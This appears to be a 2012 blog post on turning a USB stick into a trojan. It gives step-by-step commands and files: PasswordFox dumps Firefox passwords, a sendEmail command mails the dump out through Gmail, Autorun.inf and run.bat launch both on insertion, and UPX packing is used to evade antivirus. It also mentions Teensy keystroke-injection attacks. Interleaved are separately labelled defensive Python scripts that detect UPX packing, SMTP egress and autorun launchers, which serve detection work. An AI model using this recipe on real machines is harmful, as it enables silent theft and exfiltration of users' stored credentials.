27/04/2012

Trojanizing USB sticks

USB nowadays

Nowadays most of us own a USB flash drive (sometimes also referred to as a USB stick, USB memory stick or simply a flash drive) that we use when we want to store data temporarily. They are small and lightweight and very practical when you want to move files from one computer to another.

That is all fine, but what happens when untrusted USB sticks are inserted into our computers? How difficult is it for someone to steal and e-mail all our passwords within seconds? For someone who knows how, the answer is simple: a few seconds is more than enough to collect all the passwords from your laptop.

USB flash drives are used when data is moved between home and office. They are also often used when data is moved inside an office, for example to or from a computer that is not connected to a network. That is the main way a PC that is not connected to the Internet can still be infected with Trojans, viruses and other malicious software. A very well known worm that had a great impact worldwide is Conficker [9]. Conficker initially did not use USB sticks as an infection medium, but later on it updated itself and started infecting USB sticks, and that was when its spread increased dramatically.

Trojanizing a USB stick

How difficult is it for someone to convert a USB stick into a Trojan? This article is going to show you that even a person with little to no knowledge of computers can steal and e-mail your passwords using open source and freeware software to construct a USB Trojan that is practically undetectable by commercial antivirus software, because each of these programs is a legitimate program on its own; it is only when they are combined that they can do real damage.

The key components of constructing a USB Trojan would be:

  1. The password collector (i.e. the tool that is going to collect your passwords).
  2. The transportation method (i.e. the method used to send the stolen passwords over the Internet).
  3. A compressor (i.e. a tool to reduce the payload size).
  4. The execution method (i.e. the method used to execute the desired payload when the USB stick is inserted into the target PC).

The first tool to use would be the password collector; for the purpose of this article I am going to use PasswordFox. For the transportation method I will use SMTP along with a tool called SendEmail, and for the execution method I will use Autorun.

About SendEmail our Communication Channel

SendEmail is a lightweight, command line SMTP e-mail client. With it you can send e-mails from a command line; this free program is simple to use and feature rich. It was designed to be used in bash scripts and batch files. SendEmail is written in Perl (but can also run as a standalone executable on Windows) and is unique in that it requires NO MODULES. It has an intuitive and flexible set of command-line options, making it very easy to use. SendEmail is licensed under the GNU GPL, either version 2 of the License or any later version. Supported platforms are Linux, BSD, OS X, Windows 98, Windows NT, Windows 2000 and Windows XP. [1]

The following picture shows a screenshot of the SendEmail help output from the command line:

 
Note: SendEmail also supports TLS, but for the purposes of this article we are not going to use the TLSv1.0 option, although it might be a good idea to do so if you want to bypass reverse SSL proxies or content inspection devices.

Why use SendEmail?

I think it is obvious how SendEmail can be used for malicious purposes such as spamming, e-mail spoofing attacks, automated virus distribution, etc. A malicious user can simply bundle the SendEmail executable with another executable (e.g. notepad.exe) as a Trojan using a packer such as UPX [2] or the IExpress Wizard [3], upload the executable to his/her web site and then use social engineering to convince innocent users to download and execute the maliciously altered executable. But the most interesting characteristics of SendEmail are that it is a standalone executable and its size is only 692 KB.

About PasswordFox as our Password Collector

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by the Mozilla Firefox web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to view the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. This utility works under Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows 7. Firefox must also be installed on your system in order to use this utility. [4]

Why Use PasswordFox

PasswordFox doesn't require any installation process or additional DLL files, but the Firefox browser must be installed on your computer in order to allow PasswordFox to grab the targeted password list. PasswordFox is again a standalone executable, and in order to start using it you can simply double-click the executable file.

After running it, the main window will display the entire Firefox password list for the last profile that you used. That's not all PasswordFox can do: it can also run from the command line and dump your Firefox password list into a txt file. Also, the tool size is ridiculously small, only 40 KB; amazing what 40 KB can do to your Firefox password profile, isn't it?

The following screenshot shows how we can actually use PasswordFox from the command line:


Note: Not much to see; the PasswordFox tool does not support a help command. Check out the /stext option used: this option is going to export all my Firefox passwords into the txt file named pass.txt.

About UPX as our Compressor

UPX is a freeware, high quality executable compressor, and ideal for our job. The UPX author claims that it has a better compression ratio than WinZip/zip/gzip, with no memory overhead for your compressed executables. UPX is distributed with full source code under the GNU General Public License v2+, with special exceptions granting free usage for commercial programs as stated in the UPX License Agreement. [2]

Compressing our executables

We will compress our executables using UPX for two main reasons: first, to reduce the possibility of antivirus detection, and second, to reduce the size of our executables. Antivirus bypassing is not so easy to achieve and is out of the scope of this article. So let's go on and compress our executables. From the command line the commands we have to issue are:

  upx --brute sendEmail.exe
  upx --brute PasswordFox.exe

The following screenshot shows the outcome of these commands:


Note: PasswordFox.exe was already compressed with UPX by its author.
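Because legitimate tools ship UPX-packed (PasswordFox itself does, as the note above says), a defender triaging files found on a removable drive will want to recognise the packer rather than rely on an antivirus signature. The following Python script is an added example, not code from the original post or from the UPX project: it walks the PE section table and reports UPX section names or the "UPX!" marker UPX leaves in its stub. It builds its own minimal, non-executable PE header as constructed test input; the header layout it relies on (e_lfanew at offset 0x3C, a 20-byte COFF header, 40-byte section headers) is the documented PE format.

```python
"""Spot UPX-packed PE files by their section names (added example)."""
import struct

COFF_HEADER_SIZE = 20       # Machine .. Characteristics
SECTION_HEADER_SIZE = 40    # IMAGE_SECTION_HEADER
UPX_MARKER = b"UPX!"        # marker UPX writes into its decompression stub


def section_names(pe_bytes):
    """Return the section names of a PE image, or [] if it is not a PE."""
    if len(pe_bytes) < 0x40 or pe_bytes[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4
    if len(pe_bytes) < coff + COFF_HEADER_SIZE:
        return []  # truncated header
    # COFF header: NumberOfSections at +2, SizeOfOptionalHeader at +16
    num_sections = struct.unpack_from("<H", pe_bytes, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe_bytes, coff + 16)[0]
    table = coff + COFF_HEADER_SIZE + opt_size
    names = []
    for i in range(num_sections):
        raw = pe_bytes[table + i * SECTION_HEADER_SIZE:][:8]
        if len(raw) < 8:
            break  # truncated section table
        names.append(raw.split(b"\0", 1)[0].decode("ascii", "replace"))
    return names


def looks_upx_packed(pe_bytes):
    """True if the section names or the stub marker point at UPX."""
    names = section_names(pe_bytes)
    by_name = any(n.upper().startswith("UPX") for n in names)
    return by_name or UPX_MARKER in pe_bytes


def build_fake_pe(names, trailer=b""):
    """Constructed test input: a minimal PE32 header that cannot run."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    optional = b"\0" * 0xE0  # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x014C, len(names), 0, 0, 0,
                       len(optional), 0x0102)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + b"\0" * 32
                        for n in names)
    return dos + b"PE\0\0" + coff + optional + sections + trailer


if __name__ == "__main__":
    packed = build_fake_pe(["UPX0", "UPX1", ".rsrc"])
    plain = build_fake_pe([".text", ".data", ".rsrc"])
    print("packed:", section_names(packed), looks_upx_packed(packed))
    print("plain :", section_names(plain), looks_upx_packed(plain))
```

A positive result only says "packed with UPX", which is neither proof of malice nor hard to hide (section names can be renamed after packing); its value is as a triage signal that tells you to unpack and look at what is inside before trusting an antivirus verdict.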

Sending our Password Collection Using Sentmail

Sending an e-mail that is not easily traceable is not going to be easy. We will need to either use a valid e-mail address on a publicly well known e-mail service such as Google or Yahoo, or use an open mail relay server.

An open mail relay is an SMTP server configured in such a way that it allows anyone on the Internet to send e-mail through it, not just mail destined to or originating from known users. This used to be the default configuration in many mail servers; indeed, it was the way the Internet was initially set up, but open mail relays have become unpopular due to their exploitation by spammers and worms. Many relays were closed, or were placed on blacklists by other servers. [5]


For the purpose of this article we will use the Google mail server to send our malicious e-mail, so the following command would do the job:


sendEmail.exe -t somemail@something.com -o tls=auto -f yourgmail@gmail.com -u yourmailsubject -m yourmailbody -a pass.txt -s smtp.gmail.com -xp yourpassword -xu yourusername


Note: In order to use Google mail you have to use TLS (SendEmail does support TLS, so it is not going to be a problem). The -a option adds the file attachment containing the passwords.
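The transport above is ordinary SMTP to a public mail server wrapped in TLS, so content inspection will never see the attachment; what a defender can see is a workstation opening its own outbound SMTP connection instead of handing mail to the organisation's relay. The following Python script is an added example, not code from the original post: it parses constructed firewall log lines (the log format is made up for this example) and flags SMTP egress on ports 25, 465 and 587 from any host other than the approved mail relay. The internal address ranges and the relay address are assumptions stated in the code.

```python
"""Flag hosts that speak SMTP to the Internet directly (added example)."""
import ipaddress
import re

SMTP_PORTS = {25, 465, 587}
# Assumption: only this host may relay mail to the outside.
MAIL_RELAYS = {"10.0.0.25"}
# Assumption: the organisation's internal address space.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# Constructed log format: "<date> <time> <action> src=.. dst=.. dport=.."
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<action>\w+) src=(?P<src>[\d.]+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$")

# Constructed sample; 203.0.113.10 stands in for a public mail server.
SAMPLE_LOG = """\
2012-04-27 10:01:02 ALLOW src=192.168.1.23 dst=192.168.1.5 dport=445
2012-04-27 10:01:05 ALLOW src=192.168.1.23 dst=203.0.113.10 dport=587
2012-04-27 10:01:09 ALLOW src=10.0.0.25 dst=203.0.113.10 dport=25
2012-04-27 10:02:11 ALLOW src=192.168.1.40 dst=203.0.113.10 dport=443
2012-04-27 10:02:30 ALLOW src=192.168.1.40 dst=203.0.113.10 dport=465
2012-04-27 10:03:00 ALLOW src=192.168.1.40 dst=10.0.0.25 dport=25
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(addr):
    """True if the address falls inside one of the internal ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_smtp_egress(log_text, relays=MAIL_RELAYS):
    """Return (src, dst, dport) for SMTP connections to external hosts
    that were not made by an approved relay."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["dport"] not in SMTP_PORTS:
            continue
        if rec["src"] in relays or is_internal(rec["dst"]):
            continue  # relay traffic, or mail submitted to the internal relay
        hits.append((rec["src"], rec["dst"], rec["dport"]))
    return hits


if __name__ == "__main__":
    for src, dst, port in find_smtp_egress(SAMPLE_LOG):
        print(f"direct SMTP egress: {src} -> {dst}:{port}")
```

On the sample, the two workstation connections to port 587 and 465 are reported while the relay's own port 25 session and the internal submission are not. The same rule is what an egress firewall would enforce outright: a workstation has no business talking SMTP to anything but the internal relay, and blocking it removes this transport regardless of which tool carries the attachment.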

Launching a program on a USB

Using Autorun.inf to automatically launch a program from a USB flash drive is very easy, but you have to know which Windows version (e.g. Windows 7, Vista, XP, etc.) you are targeting, because the design of your USB Autorun depends on it. Below I will show you how to handle this in different Windows versions. [7]

Handling different Windows versions means using the OPEN and ACTION keywords in the Autorun.inf file. So the Autorun file would look like this in its final form:

  [AutoRun]
  OPEN=run.bat
  ACTION=run.bat

The run.bat file is a batch file that you can edit with Notepad; add the commands shown below:

  start PasswordFox.exe /stext pass.txt
  start sendEmail.exe <parameters>

If Autorun is disabled on a specific computer, you will not see the Autorun menu when the flash drive is plugged in; hence the application will not start automatically. In that case you will be forced to explore the drive and run the program manually. If you need to launch the program with specific command line parameters, you can open a console window and type the parameters there, or use a .bat script to do the same task. [10]
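To check a removable drive for exactly the kind of Autorun.inf shown above, and to check whether the local AutoRun policy would still honour it, here is an added Python example that is not part of the original post. The [AutoRun] keys it treats as launchers (open, shellexecute and shell\<verb>\command) are the documented ones; the policy interpretation follows the NoDriveTypeAutoRun registry value, where each bit is 1 << the Windows drive type (0x04 is removable) and 0x91 is the default. The sample file content is the Autorun.inf from the post.

```python
"""Audit an Autorun.inf and a NoDriveTypeAutoRun policy value (added example)."""

# [AutoRun] keys that make Windows execute something. "action" only labels
# the AutoPlay menu entry, so it is reported alongside rather than as a launcher.
LAUNCH_KEYS = {"open", "shellexecute"}

# NoDriveTypeAutoRun bit = 1 << GetDriveType() value; 0x91 is the default.
DRIVE_TYPE_BITS = {
    0x01: "unknown", 0x02: "no root directory", 0x04: "removable",
    0x08: "fixed", 0x10: "network", 0x20: "CD-ROM", 0x40: "RAM disk",
    0x80: "reserved",
}
DISABLE_ALL = 0xFF  # disables AutoRun on every drive type

# The Autorun.inf from the post, used here as sample input.
SAMPLE_AUTORUN = """\
[AutoRun]
OPEN=run.bat
ACTION=run.bat
"""


def parse_autorun(text):
    """Return {lower-case key: value} from the [AutoRun] section of an INI."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_entries(entries):
    """Return [(key, value)] for keys that would execute a program."""
    found = []
    for key, value in entries.items():
        is_verb = key.startswith("shell\\") and key.endswith("\\command")
        if key in LAUNCH_KEYS or is_verb:
            found.append((key, value))
    return found


def autorun_disabled_on(policy_value):
    """Drive-type names on which this NoDriveTypeAutoRun value blocks AutoRun."""
    return {name for bit, name in DRIVE_TYPE_BITS.items() if policy_value & bit}


def removable_autorun_allowed(policy_value):
    """True if a USB stick's Autorun.inf would still be honoured."""
    return not (policy_value & 0x04)


if __name__ == "__main__":
    entries = parse_autorun(SAMPLE_AUTORUN)
    for key, value in launch_entries(entries):
        print(f"launcher: {key} -> {value}  (menu label: {entries.get('action', '-')})")
    for value in (0x91, DISABLE_ALL):
        print(f"NoDriveTypeAutoRun={value:#x}: removable allowed="
              f"{removable_autorun_allowed(value)}, blocked on "
              f"{sorted(autorun_disabled_on(value))}")
```

With the default 0x91 the sample file's OPEN=run.bat would be honoured on a removable drive; 0xFF under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer turns it off for every drive type, which is the "disable autorun" advice the epilogue gives. Windows 7, and XP/Vista with update KB971029, already ignore Autorun.inf on removable drives, so the remaining exposure is older or unpatched systems, and the file scan is still worth running there.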

Finally launching the attack

Step 1: Copy the .bat file that issues the commands described above.
Step 2: Make sure USB Autorun is enabled on the target machine.
Step 3: Copy the Autorun.inf file with the configuration described above.

Further Attack improvements

The attack described in this article can be optimized to be more resilient to antivirus software, but bypassing antivirus software is out of the scope of this article due to its added complexity.

Bypassing the auto-run limitation

The Teensy USB HID attack vector is a remarkable combination of customized hardware and bypassing restrictions by keyboard emulation. Traditionally, when you insert a DVD/CD or USB stick and Autorun is disabled (after Windows XP Service Pack 2 Autorun is disabled, I think it is SP2!), your autorun.inf isn't called and you can't execute your code automatically. With the Teensy HID based device you can emulate a keyboard and mouse. When you insert the device it will be detected as a keyboard, and with the microprocessor and onboard flash memory storage you can send a very fast set of keystrokes to the machine and completely compromise it. You can order a Teensy device for around 17 dollars at http://www.prjc.com.

The following extract was taken from the blog of werew01f, who was kind enough to comment on the inaccuracy of this blog post:

Teensy is a USB-based micro-controller development board, which can be programmed to emulate any device and store program code. I have written an article that describes how you can emulate the device as a HID (Human Interface Device) and inject attack code and execute commands on the system.
    
Epilogue

I am sure I proved how easy it is to steal and e-mail user credentials within a few seconds, even if you have little to no experience at all. Again, nowadays it is very critical to protect your assets from all dangers. The best thing someone could do to protect his/her information is to disable Autorun and apply proper endpoint protection software.

References:

  1. http://caspian.dotconf.net/menu/Software/SendEmail/
  2. http://upx.sourceforge.net/
  3. http://technet.microsoft.com/en-us/library/dd346760.aspx
  4. http://www.nirsoft.net/utils/passwordfox.html
  5. http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
  6. http://en.wikipedia.org/wiki/Open_mail_relay
  7. http://www.samlogic.net/articles/autorun-usb-flash-drive.htm
  8. http://www.samlogic.net/articles/autorun-usb-flash-drive-windows-7.htm
  9. http://en.wikipedia.org/wiki/Conficker
  10. http://lazybit.com/index.php/2007/03/01/usb_flash_drive_autorun
  11. http://www.offensive-security.com/metasploit-unleashed/Teensy_USB_HID_Attack